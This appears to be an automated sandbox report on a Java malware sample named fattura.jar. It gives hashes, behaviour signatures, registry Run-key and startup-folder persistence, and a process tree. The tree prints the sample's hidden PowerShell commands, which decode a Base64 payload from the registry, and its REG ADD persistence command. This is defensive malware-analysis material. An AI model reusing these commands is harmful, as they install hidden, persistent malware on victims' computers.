Analysis
- max time kernel: 149s
- max time network: 151s
- platform: windows10_x64
- resource: win10v200430
- submitted: 29-06-2020 18:10
Static task: static1
Behavioral task: behavioral1
- Sample: fattura.jar
- Resource: win7v200430 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: fattura.jar
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: fattura.jar
- Size: 222KB
- MD5: 9f4c61b914d5174226a6591f9e9a2a48
- SHA1: 558fa0ea8e2ea1c3c6b618789a88081eebeeab4c
- SHA256: eb76c8ea9c1857530e537b318eeac0781f7bbc68ad9e0152bcb2db5a8af71d97
- SHA512: f433da3b79fdd9f135094fc546988f81f535793a01b3b73803d7ed5f9b6e6eaacc685ee50e73ff7e3c066deeab7208ff64b55e7a5bc704966f8820b6a8dd81fc
- Score: 8/10
Malware Config
Signatures
- Modifies registry key (1 TTPs, 1 IoCs)
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 1072 | powershell.exe
    Token: SeDebugPrivilege | 3256 | powershell.exe
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes (pid | process):
    1072 | powershell.exe (3 IoCs)
    3256 | powershell.exe (3 IoCs)
- Modifies registry class (1 IoCs)
  Processes (description | ioc | process):
    Key created | \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000_Classes\Local Settings | wscript.exe
- Adds Run entry to start application (2 TTPs, 8 IoCs)
  Processes (description | ioc | process):
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tDHMhQUaqL = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\tDHMhQUaqL.vbs\"" | WScript.exe
    Key created | \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run | wscript.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr = "\"C:\\Program Files\\Java\\jre1.8.0_66\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\AppData\\Roaming\\ntfsmgr.jar\"" | wscript.exe
    Key created | \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | REG.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\Adobe Java bridge = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\AIR\\jre13v3bridge.jar" | REG.exe
    Key created | \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\software\microsoft\windows\currentversion\run | WScript.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\tDHMhQUaqL = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\tDHMhQUaqL.vbs\"" | WScript.exe
    Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | WScript.exe
- Drops startup file (2 IoCs)
  Processes (description | ioc | process):
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tDHMhQUaqL.vbs | WScript.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tDHMhQUaqL.vbs | WScript.exe
- Suspicious use of WriteProcessMemory (16 IoCs)
  Processes (description | pid | process | target process), each pair observed twice:
    PID 3544 wrote to memory of 816 | 3544 | java.exe | wscript.exe
    PID 816 wrote to memory of 1072 | 816 | wscript.exe | powershell.exe
    PID 816 wrote to memory of 2488 | 816 | wscript.exe | WScript.exe
    PID 816 wrote to memory of 1928 | 816 | wscript.exe | cmd.exe
    PID 1928 wrote to memory of 2128 | 1928 | cmd.exe | javaw.exe
    PID 816 wrote to memory of 2748 | 816 | wscript.exe | javaw.exe
    PID 2748 wrote to memory of 3084 | 2748 | javaw.exe | REG.exe
    PID 2488 wrote to memory of 3256 | 2488 | WScript.exe | powershell.exe
- Suspicious use of SetWindowsHookEx (1 IoCs)
  Processes (pid | process):
    2748 | javaw.exe
- Blacklisted process makes network request (26 IoCs)
  Processes (flow | pid | process):
    flows 4, 5, 9, 10, 12, 14, 15, 16, 17, 20, 22, 23, 24, 25, 27, 28, 29, 30, 31, 34, 35, 36, 37, 38, 40, 41 | 2488 | WScript.exe
Processes (tree; depth shown by indentation)
- C:\ProgramData\Oracle\Java\javapath\java.exe
  Command: java -jar C:\Users\Admin\AppData\Local\Temp\fattura.jar
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\wscript.exe
    Command: wscript C:\Users\Admin\bjzxzjbyqj.vbs
    - Modifies registry class
    - Adds Run entry to start application
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!&','m');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
    - C:\Windows\System32\WScript.exe
      Command: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\tDHMhQUaqL.vbs"
      - Adds Run entry to start application
      - Drops startup file
      - Suspicious use of WriteProcessMemory
      - Blacklisted process makes network request
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!&','A');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses
    - C:\Windows\System32\cmd.exe
      Command: "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -version 2> C:\Users\Admin\AppData\Local\Temp\output.txt
      - Suspicious use of WriteProcessMemory
      - C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
        Command: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -version
    - C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      Command: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\ntfsmgr.jar"
      - Suspicious use of WriteProcessMemory
      - Suspicious use of SetWindowsHookEx
      - C:\Windows\SYSTEM32\REG.exe
        Command: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Adobe Java bridge" /d "C:\Users\Admin\AppData\Roaming\Adobe\AIR\jre13v3bridge.jar"
        - Modifies registry key
        - Adds Run entry to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- C:\Users\Admin\AppData\Local\Temp\output.txt
- C:\Users\Admin\AppData\Roaming\ntfsmgr.jar
- C:\Users\Admin\AppData\Roaming\tDHMhQUaqL.vbs
- C:\Users\Admin\bjzxzjbyqj.vbs
- memory/816-1-0x0000000000000000-mapping.dmp
- memory/1072-3-0x0000000000000000-mapping.dmp
- memory/1928-6-0x0000000000000000-mapping.dmp
- memory/2128-7-0x0000000000000000-mapping.dmp
- memory/2488-4-0x0000000000000000-mapping.dmp
- memory/2748-11-0x0000000000000000-mapping.dmp
- memory/3084-15-0x0000000000000000-mapping.dmp
- memory/3256-16-0x0000000000000000-mapping.dmp